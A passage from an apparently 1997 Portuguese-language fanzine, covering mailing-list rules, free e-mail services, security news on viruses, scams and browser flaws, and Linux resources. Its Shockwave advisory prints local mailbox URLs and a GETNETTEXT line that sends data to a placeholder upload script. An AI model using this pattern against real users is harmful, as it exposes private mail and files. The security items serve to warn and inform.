         lista de mesmo tema que a lista proposta;
       . sondar a rea,c~ao e o impacto que a lista
         vai causar nas outras pessoas.

     Quanto tempo deve durar esta fase?  O
     tempo que o proponente considerar oportuno.
     Ou seja, quando ele para quando j'a tiver recolhido
     subs'idios suficientes para decidir
     com seguran,ca sobre a continua,c~ao ou
     n~ao do processo de cria,c~ao da lista.
     Se a resposta foi positiva e o proponente
     acredita que a lista ser'a bem
     recebida ele pode passar, com tranquilidade,
      para o passo seguinte.

  1- Vota,c~ao
     ---------
     O objetivo desta fase 'e confirmar
     a aprova,c~ao da lista pelos usu'arios
     da internet.  Estas fase 'e mais formal
     e est'a sujeita a algumas regras importantes.

     O in'icio desta fase 'e indicado pelo
     envio de uma mensagem que vai registrar
     o pedido de cria,c~ao da lista.  Esta
     mensagem dever'a ser distribu'ida
     na lista esquina.

     A mensagem deve ser enviada `a
     esquina-das-listas@dcc.unicamp.br e
     dever'a conter o comando:

     submeta esquina

     Abaixo deste comando a mensagem dever'a
     conter a ficha de cria,c~ao da lista, contendo
     v'arias informa,c~oes:
       . nome da lista proposta.
       . escopo da lista: descri,c~ao dos objetivos
         da lista, p'ublico alvo e outras
         informa,c~oes que o proponente considerar
         pertinentes.
       . orienta,c~ao aos votantes:
         - prazo de vota,c~ao:
           data final da vota,c~ao (prazo m'inimo
           de duas semanas);
         - endere,co de vota,c~ao: endere,co para
           o envio de votos.  (Os votantes
           devem ser instru'idos a n~ao mandarem seus
           votos para listas, apenas para o(s)
           endere,co(s) indicados.)
         - formato do voto SIM: que mensagem deve
           ser enviada para o endere,co de vota,c~ao
           para indicar a _aprova,c~ao_ da lista
           proposta.
         - formato do voto NAO: que mensagem deve
           ser enviada para o endere,co de vota,c~ao
           para indicar a _desaprova,c~ao_ da lista
           proposta.

     IMPORTANTE:  A organiza,c~ao e condu,c~ao
                  da vota,c~ao 'e tarefa de responsabilidade
                  do proponente da lista.


  2- Divulga,c~ao dos Resultados e Averigua,c~ao
     -------------------------------------------
     O resultado final da vota,c~ao dever'a ser
     divulgado pelo proponente da lista
     tamb'em na lista esquina.

     Isto 'e feito atrav'es do envio de uma
     mensagem para: esquina-das-listas@dcc.unicamp.br
     e conter'a o comando:

     submeta esquina

     Abaixo deste comando dever'a vir a
     lista completa dos endere,cos dos
     votantes e uma indica,c~ao clara de
     suas op,c~oes: a favor ou contra a aprova,c~ao
     da lista proposta.

     Ser'a dado um prazo de uma semana para que
     os resultados possam ser verificados pelos
     votantes e demais usu'arios da esquina.
     Qualquer suspeita de fraude tornar'a nulo
     todo o processo; abortando a cria,c~ao da lista.

     Se a lista receber um n'umero de aprova,c~oes
     razo'avel e o a rea,c~ao negativa a cria,c~ao
     da mesma n~ao for muito grande, a lista
     ser'a criada pelo administrador da
     esquina-das-listas.


  Listas Inativas
  --------------
    As listas que que n~ao tiverem nenhuma movimento
    no per'iodo m'inimo de tr^es meses poder~ao
    ser descontinuadas.

                                        (mjce/1997.abril.19)\

-----------------------------------------------


FREE E-MAIL
===========

1. NetForward
http://www.netforward.com

2. HoTMaiL
http://www.hotmail.com

3. Trale
http://www.trale.com

4. WWDG Free Email
http://www.wwdg.com/email/

5. MailMasher
http://www.mailmasher.com

6. StarMail - Over 100 domains to choose from!!
http://www.starmail.com

7. iName - Over 100 domains to choose from!!
http://www.iname.com

8. Geocities
http://www.geocities.com

9. Juno
http://www.juno.com

10. Net@ddress
http://netaddress.usa.net

11. Bigfoot
http://www.bigfoot.com

12. MailHost
http://www.mailhost.net

13. POBox
http://pobox.com/pobox/

14. POBoxes
http://www.poboxes.com

15. PEmail
http://www.pemail.net

16. La Jolla Shores
http://www.lajollashores.com

17. From.Net
http://from.net

18. iName
http://www.unforgettable.com

19. Four11
http://www.four11.com


       Lenimar N. A.(retirado do jampa@lists.americasnet.com)



%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


BUGS E ETC..

E D U P A G E
21 de janeiro de 1997  |  Portugues
FALHAS DE SEGURANCA NA REDE

Dan Farmer, autor do software SATAN que foi projetado para entrar as
falhas nos sistemas de seguranca dos sitios na Web, acaba de realizar
uma pesquisa nao cientifica em aproximadamente 2.200 sitios na Web e
encontraram de 70 a 80%  "falhas serias de seguranca".  A pesquisa foi
feita entre 1.700 sitios "de maior popularidade" e outros 500
selecionados de forma aleatoria.  Nos sitios de maior popularidade
encontrou-se o dobro do percentual em problemas de seguranca do que
aquele encontrado na amostra selecionada aleatoriamente.  "Muitos dos
sitios realmente interessantes estao fazendo malabarismos", explicou
Farmer.  "Estao oferecendo uma gama de servicos - correio eletronico,
noticias sobre a Internet, contas de usuario e outros do genero.  Tais
servicos nao sao dificeis de manter no ar.  Mas comece a colocar
"bolinhas" la' e perde-se o controle ...  Simplesmente e' dificil
manejar tudo isso durante muito tempo.  E, de tempos em tempos, reclama-se
dos empregados responsaveis por manter tudo em funcionamento - nao
necessariamente com seguranca.  Os administradores de sistemas quase
nunca obtem o orcamento e treinamento adequados para implanta-los com
seguranca e de forma apropriada". Dos 660 bancos revisados, uns 68%
contam com sitio que Farmer considera altamente vulneravel.

Investor's Business Daily 20 jan 97 A6

-----------------------------------------
Nao sei de onde recebi isto:

Foi reportado hoje um novo golpe perpetrado via internet! Funciona da
seguinte maneira: Voce vai a um homepage onde te avisaram (via e-mail ou qq
outra maneira) que tem imagens pornograficas, ou mulheres ao vivo, ou
alguma coisa de esportes, etc., qq que eles tenham visto que seja de seu
interesse ou que lhe aguce a curiosidade. Nesta homepage, eles lhes pedem
que baixem e instalem um software gratuito, para lhe permitir ver as
imagens ou filmes, etc., alegando que os mesmos tem formato proprietario ou
algo assim.

Ai e' que entra o golpe. Na hora em que voce usa o tal software, ele faz
uma conexao via uma ligacao telefonica de larga distancia, para fora dos
EUA, atraves de uma companhia que vai cobrar entre 1 a 2 dolares por
minuto! E pior, mesmo quando voce para de usar o tal leitor de imagens ou
mesmo o seu browser, a conexao continua ativa, so' se desligando quando
voce desligar o computador!!! Se voce foi a alguma homepage assim, apague
imediatamente o tal leitor.

Inumeras pessoas cairam neste golpe e se viram com contas absurdas no final
do mes!!!

Avise a todos os internautas que voce conhecer.

--


noticia vinculada pelo Universo OnLine:

>Novo virus de macro ataca MS Mail
>da Universo Online
>
>A empresa de antivirus McAffee localizou um novo
virus de marco que
>manda mensagens ao acaso de pessoas que usam o
Microsoft MS Mail.
>
>"ShareFun" e' o nome do virus, que e' simples de
detectar e prevenir.
>Como todos os virus transmissmveis por correio
eletronico, ele e'
>mandado num "attachment". Para "pegar" o virus, o
usuario precisa
>executa-lo - geralmente com um clique duplo sobre o
"attachment".
>
>Usuarios experientes evitam abrir "attachments" de
que n{o sabem a
>origem. Segundo a McAffee, este i o grande problema
do "ShareFun".
>Ele pode ser enviado por um amigo.
>
>A McAffee descobriu a existjncia do vmrus atravis de
um cliente. Uma
>grande corpora|{o suspeitou que seu sistema estava
infectado. Um
>funcionario da McAffee explicou que geralmente a
mensagem vem com
>o assunto "You have to see this"! Quando a
mensagem i aberta, esta
>em branco. Se o usuario clicar no "attachment",
quando o Word o abre,
>o vmrus i iniciado.
>
>O vmrus tem uma chance em quatro de voltar para o
MS Mail e mandar
>automaticamente mensagens com "attachments" dele
mesmo para trjs
>pessoas na lista de endere|os do programa.
>
>A cada vez que o Word i aberto, o vmrus fica ativo de
novo e tem uma
>chance de 25% de ser mandado atravis do sistema de
mail.
>
>O problema deste vmrus i que, a cada vez que ele
manda uma mensagem,
>ele envia o documento em que a pessoa estiver
trabalhando no momento.
>Se ela estiver trabalhando num texto confidencial, por
exemplo, ele
>sera enviado a trjs pessoas, ao acaso.
>
>Segundo a Microsoft, o MS Mail esta sendo
descontinuado e substitumdo
>pelo Exchange. O Word 97 tem uma fun|{o que
detecata qualquer macro -
>seja ou n{o um vmrus. Quem n{o tiver o Word 97
podem copiar a fun|{o
>no site da Microsoft.

Fonte ==>
http://www.uol.com.br/internet/flashvox/fla2102.htm

Ja' andei conferindo no site da McAfee e la' eles
confirmam o virus,
inclusive explicando como e' feito a infeccao e a sua
propagacao.
Maiores detalhes podem ser obtidos em:


http://www.mcafee.com/support/techdocs/vinfo/v3333.
html

Uma analise bem interessante de como as mensagens
que foram repassadas
pela imprensa sobre o virus pode ser vista no seguinte
site:

  http://www.kumite.com/myths/myths/myth029.htm

Maiores informacoes sobre virus de macro e como se
previnir dele podem
ser obtidas em:

  http://www.microsoft.com/kb/articles/q138/8/68.htm

Cabe ressaltar que este virus nao vai infectar o
computador pelo simples
fato de ser recebido pelo email, mas sim se rodado, como
pode acontecer
com qualquer executavel anexado a um email... Cabe ai' a
quem receber o
email ser cuidadoso, fazendo com que o arquivo
recebido seja "passado"
por um anti-virus. Outra recomenda|{o e' designar que
arquivos .DOC nao
sejam abertos automaticamente pelo MS-Word, mas sim
pelo WordView, que
pode ser conseguido no site da Microsoft:


http://www.microsoft.com/word/internet/viewer/viewer9
5/default.htm

Como no WordView nao sao executados macros, alem
de que nao ha' como
salvar arquivos, ele se torna uma ferramenta bastante
util para visualizar
arquivos sem correr o risco de ver o seu Word ser
infectado por um virus de
macro.

[]'s
http://www.tca.com.br/usrf/charles/
-------------------------------------------------------
APPLETS JAVA PODEM ATACAR SUA REDE

      Paul Merenbloom, para o InfoWorld

De vez em quando, os privilegios de ser colunista do InfoWorld sao um
tiro pela culatra. Alguem leu minha coluna e me enviou alguns
aplicativos Java muito interessantes projetados para gerenciar e
controlar roteadores de maneira segura. Baixei-os recentemente e logo
reparei que meu disco rigido comecou a fazer extravagancias. De
repente, passou a funcionar como se estivesse sem espaco.

Pensei que talvez fosse um problema de caching do Windows 95, por
isso desliguei a maquina, dei novo boot no modo MS-DOS e fui direto
para o diretorio WINDOWS\TEMP. Havia muitos arquivos TMP esquecidos
la. Com um simples DEL *.* resolvi o problema e retornei ao trabalho.

Mas meus problemas nao pararam ai. Meu browser estava rodando o
codigo Java de novo - desta vez, sem qualquer outro aplicativo na
memoria - quando o disco rigido ficou enlouquecido. Droga! Eu tinha
uma conexao dial-up aberta porque o codigo que estava executando veio
de uma fonte baseada na Web. Bingo! Uma olhada rapida nas luzes do
modem mostrou a luz de dados enviados brilhando intensamente!

A luz apagou e um e o computador iniciou uma rotina de captura.
Parece que alguem estava usando o codigo Java para descarregar meu
registro e selecionar arquivos, sobretudo os terminados em .XLS -
dados de planilha.

Isto explicou o funcionamento constante do disco rigido. O codigo
estava buscando meus arquivos! Felizmente, os unicos arquivos .XLS
neste PC sao os demos que vem com o CD Office Professional da
Microsoft. Mas se houvesse dados importantes eu estaria em apuros.

Evidentemente, a pessoa que estava me mostrando o novo software de
gerenciamento nao tinha a menor ideia de que alguem havia inserido
codigo trapaceiro no aplicativo Java.

O interessante e que o applet usou meu codigo de e-mail para
redirecionar os arquivos secretamente - sem duvida, um bom exemplo de
crianca travessa brincando fora do quadrado de areia Java.

Minha experiencia ilustra um aspecto importante em termos de browsers
e Java. Primeiro, as variedades espantosas de codigo Java existentes,
cada um com um "sabor" diferente de implementacao Java, vao dificultar
muito a integracao com sistemas de seguranca padroes. Segundo, a Java
e muito interessante e oferece grande potencial, mas um applet tambem
pode estar ocultando o proximo cavalo de Troia a entrar em sua rede.

Contei esta historia a um amigo e ele sugeriu que eu desse uma olhada
em um site chamado Finjan (http://www.finjan.com).

O site Web Finjan tem um sistema de verificacao de seguranca Java que
parece muito solido. Se voce apontar seu browser Web para la,
descobrira quanta informacao um invasor pode obter empregando uma
simples query.

Mais importante, o Finjan oferece um diagnostico de seguranca que
examina seu browser e alerta-o sobre do status da implementacao de
seguranca. Tambem faz recomendacoes sobre o que esta em risco e como
voce pode fechar qualquer gap. O codigo custa US$ 49 por copia e pode
ser baixado do site.

Voce tambem pode enviar o numero do seu cartao de credito ao Finjan.
Isso e ironia demais para mim.

Este incidente prova que existem muitas maneiras de alguem extrair
dados de seu PC ou sua LAN sem seu conhecimento ou sua permissao.

Ainda sou um grande fa da Java, mas agora estou mais prudente. E
provavel que algum dia alguem desafie sua rede com estes tipos de
ferramentas Java. Quanto a mim, estou enviando ao Finjan meus US$ 49
pelo correio e pode ter certeza de que estarei checando seus
browsers.

Paul Merenbloom e vice-presidente de pesquisa de tecnologia na Piper
Jaffray, em Minneapolis.

*******************************************************************
Lista Informativa MeuPovo.


--------------------------------------------------------

Subject: Shockwave security alert !

As informacoes abaixo podem ser achadas em :

http://www.webcomics.com/shockwave/mail.html

--------------------------------------------------------------------------
Shockwave Security Alert

                       10-Mar-97 --- reported by: David de Vitry -- updated
20-Mar-97

What is this about?

     There are three potential security holes through Shockwave. All three
require Shockwave, and all three are fixed with a
     Security Fix from Macromedia, issued 3/19/97. Information in your
email, on your hard drive or on your corporate
     intranet could all be copied to a distant server. All three have been
verified by Macromedia. This chart details each:

      Security Hole
                  Affects
                                     Description
      Reading email
                  Netscape 2-3, on Win
                  95 / NT or Mac
                                     Shockwave can read mail folders from
Netscape, Eudora, and others
                                     that use a similar mail file format.
      Internal
      Websites
                  Netscape, IE, others?
                  on Win 95/ NT or Mac
                                     Shockwave has access to any website
the you have access to. This
                                     include corporate intranets and
personal webservers.
      Any local file
                  Netscape 2.02, 3.0 on
                  Win 95 / NT or Mac
                                     Shockwave also has access to any local
file on the users hard drive.
                                     The filename must be guessed by the
attacker, pulling a directory tree is
                                     not possible. This problem was
discovered by Dave Yang.


     also: How information is copied to a website | What you can do | What
are they saying



Internal Websites.

     Users of Corporate intranets who have shockwave installed are
potentially vunerable. A malicious shockwave movie
     could have access to your internal website, and potentially internal
websites or personal sites. Once the program
     accesses potentially confidential information, information can be
copied to a website on the internet.

     Users of Microsoft IE should be aware that Shockwave will
automatically install when entering a page with a
     Shockwave movie on it. Users are presented with an authenticode
digital certificate. However, the signature on it is from
     Macromedia, and not the author of the potentially malicious shockwave
movie.



Reading Email

     A developer can use Shockwave to access the user's Netscape email
folders. This is done assuming the name and path
     to the mailbox on the users hard drive. For example names such as:
Inbox, Outbox, Sent and Trash are all default names
     for mail folders. The default path to the "Inbox" on Win 95/NT would
be: "C:/Program
     Files/Netscape/Navigator/Mail/Inbox". Then the developer can use the
Shockwave command "GETNETTEXT"
     to call Navigator to query the email folder for an email message. The
results of this call can then be feed into a variable,
     and later processed and sent to a server. To access a message, for
example, the first message in a users Inbox for
     Netscape mail users, would be called using the following location:

                   For Windows: mailbox:C:/Program
Files/Netscape/Navigator/Mail/Inbox?number=0

                                     For MacOS (thanks Jeremy Traub)

mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbo
x?number=0

     Note: I have not yet added links for Eudora or similar email readers,
but these are also vunerable to this
     problem. if these links all give you an error (such as folder no
longer exists), then you might not have anything
     to worry about. However, if you see an email message in a pop up
window, and you have Shockwave
     installed, then you are vulnerable to this security hole.

     Show Me an example! Here it is, a Shockwave movie that will read your
email. This will not work for everyone, it is
     currently only setup to work with Win95 / NT, but it could be extended
to identify the browser (Jeremy Traub).



Reading Local Files

     Shockwave also has access to any local file on the users hard drive.
This problem was discovered by Dave Yang.
     Details of how this is accomplished will not be released due to the
serious nature of this problem. An demo of this
     problem is available. Again this information accessed then copied to a
website.



Interesting, but how can information be copied to a website?

     This is a well known operation. See the Full Details

     Any information that a shockwave movie has access to can potentially
be copied to a website on the internet. This
     information could then be sent back to a server cgi program that
accepts this type of information. This is done using long
     urls, where the information is passed as a query within the location
through the getnettext command. i.e.
     GETNETTEXT
"http://www...com/upload.cgi?data=This_could_be_your_content_here". This
can all happen with out
     the user ever noticing. Here are just a few types of information that
a malicious developer could obtain using this hole:

          Your email
          Any file on your local hard drive
          Any file on any website you have access to



Help: What can I do to protect myself?

     The only recommendation I have at this point is to Install the newest
version of Shockwave. Mac users just need to
     change the name of their hard drive to protect their local files,
however, shockwave still has access to webservers.


VIRUS DE LINUX(?) ----------------------------
Subject: [LINUX-BR] bliss

    http://www.math.ucsb.edu/%7Eboldt/bliss/

Fernando M.R.M.
---------------NOTA DO EDITOR----------------
O URL acima contem uma serie de links para textos interessantes,
desmistificando o assunto. Talvez os textos mais importantes relativos ao
fato sejam os que coloquei abaixo:

* PRESS RELEASE DA MCAFEE SOBRE O VIRUS BLISS *

MCAFEE DISCOVERS FIRST LINUX VIRUS; SHIPS NEW VERSION OF VIRUSSCAN TO DETECT
                           AND REMOVE BLISS VIRUS

    SANTA CLARA, CALIF. (February 5, 1997) -- McAfee (Nasdaq: MCAF), the
    world's leading vendor of anti-virus software, today announced that
   its virus researchers have discovered the first computer virus capable
   of infecting the Linux operating system. The Linux operating system is
     a publicly supported freeware variant of the Unix operating system
                that runs on Intel-based personal computers.

    The virus, which is called Bliss, is significant because many in the
   Unix industry have previously believed that viruses were not a concern
    to Unix operating system users. Unix operating systems are typically
      difficult to infect with viruses since a virus writer must have
      administrative privileges to infect a given Unix system. McAfee
   researchers believe that one reason this virus has begun to spread is
   because Linux users who are playing computer games over the Internet,
    such as DOOM, must play the game in the Linux's administrator mode,
                          which is called "root."

   "Bliss is a destructive virus which overwrites Linux executables with
       its own code," said Jimmy Kuo, McAfee's director of anti-virus
   research. "Although several incidents of Bliss infection have already
     been reported, the virus is not currently widespread. We encourage
    concerned Linux users to download a free working evaluation copy of
      our VirusScan for LINUX, which can be used to detect the virus."

                            The History of Bliss

     Very little is known about the history of the Bliss virus. McAfee
       discovered the Bliss virus two days ago, and posted a solution
   Wednesday evening on its web site. The virus is believed to have been
      created as a research project several months ago by an anonymous
      programmer, and until recently was not an "in-the-wild" threat.
     Recently, reports of the virus have begun to surface within Linux
                           Internet news groups.

                              How Bliss Works

   Bliss infects Linux executable files. Each time Bliss is executed, it
    overwrites two or more additional files. Because the virus makes its
      presence known by overwriting and destroying files each time it
       executes, users are immediately alerted to its presence. Bliss
    overwrites the first 17,892 bytes of each affected file with its own
    code. According to McAfee anti-virus researchers, all files infected
   by Bliss are irrecoverable. Although the virus does not operate under
      traditional operating systems such as DOS, Windows, Windows 95,
       Windows NT, NetWare and the Macintosh, files created in these
      aforementioned operating system formats and stored on Linux file
               servers are vulnerable to corruption by Bliss.

               McAfee Ships World's First Bliss Virus Scanner

     As a public service, McAfee has developed a special update of its
   VirusScan for LINUX software which provides an antidote for the virus.
    The free working evaluation version of the product can be downloaded
    from McAfee's web site at www.mcafee.com.. McAfee has also provided
     the virus sample to other anti-virus vendors, so that they too can
               develop solutions to protect their customers.
[Parte editada - A McAfee e' popular demais pra precisar de publicidade
deste Fanzine]
               McAfee's Web address is http://www.mcafee.com.

                                    ###

ESTA E' A RESPOSTA SOBRE A "DESCOBERTA" DO VIRUS FEITA MCAFEE

Subject:      Re: [masq] 1st virus in Linux :( (fwd)
From:         Russ Allbery 
Date:         1997/02/08
Newsgroups:   linux.dev.kernel


Ambrose Au  writes:

> In case you do not notice, there is a new destructive virus called Bliss
> which infects Linux executables.

> Its target is users who play games such as doom over the Internet with
> root access.

> Details at Mcafee's website: http://www.mcafee.com/corp/press/020597.html

This is not a virus in the way the term is used for operating systems
without memory protection.

Any program being run as root has priviledges to modify the file system
and do damage to your system; this is why you do not run general binaries
as root.  All this is is a simple Trojan Horse, based on the idea of
getting stupid people to run unknown binaries as root, with an interesting
side twist of modifying other system binaries when it runs.  McAfee's
statements about this are, at best, misleading.  To quote from their web
site:

    McAfee (Nasdaq: MCAF), the world's leading vendor of anti-virus
    software, today announced that its virus researchers have discovered
    the first computer virus capable of infecting the Linux operating
    system.

Whatever you would like to call this, it quite definitely isn't anything
new.  Trojan Horse binaries for Unix systems have been around for years,
as have Trojan Horse modified source distributions; there was a CERT
several years ago about IRC, for example.

    The virus, which is called Bliss, is significant because many in the
    Unix industry have previously believed that viruses were not a concern
    to Unix operating system users.

The implication behind this statement is patently absurd.  Obviously, as
anyone who knows anything about Unix is aware, if you run a hostile
program as root it can do all sorts of nasty things to your system.  Duh.
Again, McAfee is attempting to portray this as some major new problem when
it's nothing of the sort.

    We encourage concerned Linux users to download a free working
    evaluation copy of our VirusScan for LINUX, which can be used to
    detect the virus.

No thank you.  Linux doesn't need a virus checker; Linux administrators
need to use some basic intelligence about what they run as root.  People
who run binary-only packages obtained from untrusted sources as root on
their system get exactly what they deserve.

It looks to me like McAfee is attempting to use this as a publicity stunt
to promote their software business and to attempt to scare Linux users
into paying them money.  I'll refrain from speculating about how much of a
threat a real operating system is to a company who makes its living on
protecting users of less sophisticated operating systems from their
inherent limitations.

McAfee just flushed all respect I had for them down the toilet.

--
Russ Allbery (rra@cs.stanford.edu)      

--------------------------------------------

Subject:      Re: [masq] 1st virus in Linux :( (fwd)
From:         alan@lxorguk.ukuu.org.uk (Alan Cox)
Newsgroups:   linux.dev.kernel


> It's a virus in the old sense all right.

No. Its a trojan. If the superuser doesn't run a binary containing it then
it cannot affect more than the binaries a user has created of their own.
Having the superuser run random user installed binaries could do far
worse.

> its own remover, if you execute a binary with some weird option in the GNU
> long option style, and in that if creates a log of its activities.

Thats actually a bug - its meant to exec the 'log' copy.

> Actually, I fail to understand the need of people to relabel a virus as a
> trojan.

Because there are specific distinctions in security between a program
which actively operates and seeks to attack system resources or applications
to infect things and a trap that sits waiting for someone dumb enough to
run it.

McAffee are also wrong in that its the first unix virus for other reasons,
such as the fact if you class it as a virus then people have demoed other
similar tools. Those kind of latent trojans are big business in the
military security/information warfare world, and thus I'd also suspect soon
in the realms of sabotage and the less legal side of things.

Once you've got the BLISS source reversed BTW you can port it to just
about any OS I can think of including stuff like NT and VMS in a matter of
of minutes

Followups to linux-security and or bugtraq
-----------------------------------

BUG NO INTERNET EXPLORER

Subject: displayStory.pl?97033.wbug.htm

   By Bob Trott
   InfoWorld Electric

   Posted at 3:04 PM PT, Mar 3, 1997
   A security flaw has been revealed in Microsoft's Internet Explorer
   (IE) browser that allows devious Web page writers to use .LNK and .URL
   files to surreptitiously run programs on a remote computer, even when
   the browser is set to its highest security level.

   The security lapse was discovered by a Worcester Polytechnic Institute
   student in Massachusetts who was posting documents on a Web page and
   created a shortcut to the folder rather than copying it. The student,
   Paul Greene, accessed the shortcut, and File Explorer popped up into
   the folder.

   Greene then used Internet Explorer's version of the shortcut, .URL
   files, by changing the setting to file://filename. Although .LNK files
   only work in Windows 95, .URL files are compatible with both Windows
   95 and Windows NT 4.0.

   When run through Navigator or other non-Microsoft browser, the files
   merely display the written command.

   The shortcuts can be set to be minimized during execution, meaning
   users may not know that a program has been started, Greene said.

   "The ramification for IE is that any anti-Microsoft jerk can set up
   their Web site to be destructive to anyone using Internet Explorer and
   safe for all others browsers," Greene said.

   Microsoft planned to have information about the security flaw posted
   Monday afternoon, with a fix to follow soon thereafter, said Dave
   Fester, lead product manager for Explorer.

   Fester was quick to point out that the security breach could be
   triggered only by someone who intentionally sought to do so. And the
   malicious Web author must know what programs are on the remote
   computer in order to target them, he said.

   "A Webmaster has to know what specific programs are on (the target's)
   hard drive, as well as the path to use to activate through a link,"
   said Fester.

   However, hackers with any knowledge of DOS and Windows 95 know what
   programs are on a given PC. Also, Greene and two other students who
   built several bug demos, Geoffrey Elliott and Brian Morin, said a .BAT
   file can be copied to the Internet Explorer cache and executed from
   there, where the standard path points to all programs.

   The Explorer bug can be tested at http://www.cybersnot.com/iebug.html.

   Microsoft Corp., in Redmond, Wash., is at http://www.microsoft.com/.


    Please direct your comments to InfoWorld Electric News Editor Dana
    Gardner.

               Copyright ) 1997 InfoWorld Publishing Company
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
LINUX  DICAS, ENDERECOS, ETC..

> > perdido. O meu maior problema e que eu nao sei quais arquivos devo pegar para formar o Linux
!!
> > Alguem poderia me ajudar !!
>
>       Vamos l'a... deixa eu fazer minha boa acao do dia :)
        Acho que serao varios e longos dias :-D !!

>       Para instalar o Linux voce deve recorrer a uma distribuicao. Isto e'
> a um conjunto de pacotes que alguem ja se dignou a selecionar e distribuir
> com um sisteminha de instalacao simpatico. Ou seja ja fez o trabalho duro.
> Daria para fazer na mao tambem, mas eu duvido que voce preferira e para falar
> a verdade nao conheco ninguem que tenha tido paciencia de faze-lo.
>       Que distribuicao utilizar ? Bom... eh uma questao em aberto e se voce
> fizer a pergunta na lista recebera quilos de respostas que nao levarao a lugar
> nenhum. Vai muito dos gostos e necessidades pessoais. Entao o melhor a fazer
> e conhecer as caracteristicas das principais e ver qual se adapta mais ao seu
> gosto e necessidade. Outra opcao eh utilizar a distribuicao do seu guru parti
> cular de forma a facilitar o trabalho dele, isto e' e voce tiver algum.
>       Aqui vai uma rapida descricao:
>
>       slackware: tem a vantagem de ser possivel instalar facilmente de
> diquetes. Eh o sistema mais cru e com menos aplicativos, mas nada impede que
> voce posteriormente instale-os separadamente. Nao possue um sistema de controle
> dependencias.
>
>       RedHat: eh  o que possui o sistema de instalacao mais simpatico e com
> controle de dependencias razoavel. Possui o maior numero de aplicativos inclu
> ive alguns nao free-software. Ganhou o premio de melhor distribuicao de sistema
> operacional para PC ano pasado.
        A meu ver esse me parece ser a melhor opcao !!

>       debian:antiga distribuicao da free software foundation. Possui um siste
> ma de instalacao muito decente e com um controle de dependencias bem rigido,
> porem e' em modo texto, o que nao chega a ser um problema. Possui tambem uma
> boa selecao de aplicativos. A principal vantagem e a estrutura do filesystem
> compativel com a do SVR4( ou seja solaris e cia). Eh a que eu utilizo.
>       Para comprar o bizu e' a cheapbytes: http://www.cheapbytes.com.
>       Para fazer ftp ftp.sunsite.dcc.unicamp.br
>       Voce pode ler uma comparacao entre as distros na pagina do Linux Journal
>
>

Subject: [LINUX-BR] Queres um Linux "pequeno" para baixar...? (fwd)

Vai na ftp.sunsite.unc.edu/pub/Linux/Incoming e pega
  o Dilinux ou DOSLinux...

Sao uns 7 arquivos de 1.4Mb e mais um executavel.

Depois de descompactar e instalat teras um Linux
  que boota via DOS e roda em ambiente texto...

Se quiseres o ambiente grafico vais ter que pegar mais
  umas "coisinhas" ;)

Mas com isto ja da para le ligar ao provedor de
  acesso e navegar na rede.

TTS T+

SUPER PAGINA DO LINUX
Gostei tanto que coloquei aqui o conteudo do URL abaixo. O autor, Marcelo,
ta' fazendo um trabalho legal e a URL dele
(http://www.dca.fee.unicamp.br/~malheiro/linux/index.html)
Os links abaixo foram tirados da pagina dele e o cara aceita inclusoes.
http://www.dca.fee.unicamp.br/~malheiro/linux/serv.html

           Servicos, Paginas e Documentacao sobre Linux no Brasil

                                Documentacao

   Linux FAQ em Portugues
          http://www.inf.ufrgs.br/~kojima/linux/faq-linux.html

   Linux Documentation Project - mirror 1
          http://www.conectiva.com.br/LDP/linux.html

   Linux Documentation Project - mirror 2
          http://www.opensite.com.br/linux/linux.html

   LDP-br Home Page
          http://www.dca.fee.unicamp.br/~malheiro/linux/LDP-br.html

   Portuguese HOWTO - mirror
          http://www.conectiva.com.br/LDP/HOWTO/Portuguese-HOWTO.html

                                   Dicas

   Imprimindo do Linux em uma rede Windows
          http://www.pop-ms.rnp.br/~pbastos/samba.html

   Sobre Virtual Hosts
          http://www.dowell.com.br/virtual.html

                              Paginas diversas

   Grupo de Usuarios Linux do IME/USP
          http://www.ime.usp.br:80/gu-linux/

   Pagina do Rxo
          http://www.geocities.com/SiliconValley/Park/6151/linux.html

                            Mecanismos de Busca

   Pesquisa no histrico da lista Linux-br
          http://www.openline.com.br/linux-br/swish.html - via Swish
          http://www.openline.com.br/linux-br/ghindex.html - via Glimpse

                               Canais de IRC

   #Linux na BrasNet - assuntos diversos
          http://www.sjinfo.com.br/~madmax/linux/

                            Listas de Discussao

   Linux-br - assuntos diversos
          http://www.openline.com.br/linux-br/
          Para se inscrever mande um mail para listproc@listas.ansp.br
          com subscribe linux-br [seu nome] no corpo da mensagem.

   LinuxISP-BR - Linux em provedores de acesso
          http://www.conectiva.com.br/listas/LinuxISP-BR/
          Para se inscrever mande um mail para
          LinuxISP-BR-request@listas.conectiva.com.br com apenas
          subscribe no campo de subject/assunto.

   LDP-br - Lista da iniciativa LDP-br
          Para se inscrever mande um mail para
          ldp-br-request@listas.sonet.com.br com subscribe no campo de
          subject/assunto.

   Linux - assuntos diversos
          Para se inscrever mande um mail para majordomo@opensite.com.br
          com subscribe linux no corpo da mensagem.

                                Sites de FTP

   CCE/UFPR - Slackware 3.2, StarOffice 3.1, Kernels e XFree 3.2 *new*
          ftp://cce.ufpr.br/pub/linux/

   CCE/UFPR - Arquivo da lista Linux-br
          ftp://cce.ufpr.br/pub/linux-br/

   FEE/UNICAMP - RedHat, Slackware, Sunsite
          ftp://ftp.fee.unicamp.br/pub/Linux/

   IC/UNICAMP - Sunsite
          http://sunsite.unicamp.br/pub/operating_systems/Linux/
          ftp://sunsite.unicamp.br/pub/operating_systems/Linux/

   IC/UNICAMP - GNU Software
          http://sunsite.unicamp.br/pub/packages/gnu/
          ftp://sunsite.unicamp.br/pub/packages/gnu/

   IF/USP - Sunsite, TSX-11, Debian, RedHat, Kernels, Java, Perl, Tcl/Tk,
          X11R6, e mais...
          ftp://linux.if.usp.br/pub/mirror/

   IME/USP - Debian
          ftp://paprika.ime.usp.br/pub/linux/

   Inside - Sunsite (quase completo) *new*
          ftp://ftp.iis.com.br/pub/Linux/

   Openline - RedHat
          ftp://ftp.openline.com.br/mirror/

   SJ Internet - Slackware, Kernels, HOWTOs
          ftp://ftp.sjinfo.com.br/pub/linux/

   UNICAMP - GNU Software
          ftp://ftp.unicamp.br/pub/gnu/

   UNICAMP - Java para Linux
          ftp://ftp.unicamp.br/pub/languages/java/linux/

     _________________________________________________________________


###################################
NOTICIAS
Subject: [LINUX-BR] Linux no Espaco

Texto extraido da coluna vitrine da revista Exame, de 26/03/97

"Qual sistema operacional vai controlar os experimentos de gravidade a
bordo da proxima missao espacial do onibus espacial da Nasa ? Errou quem
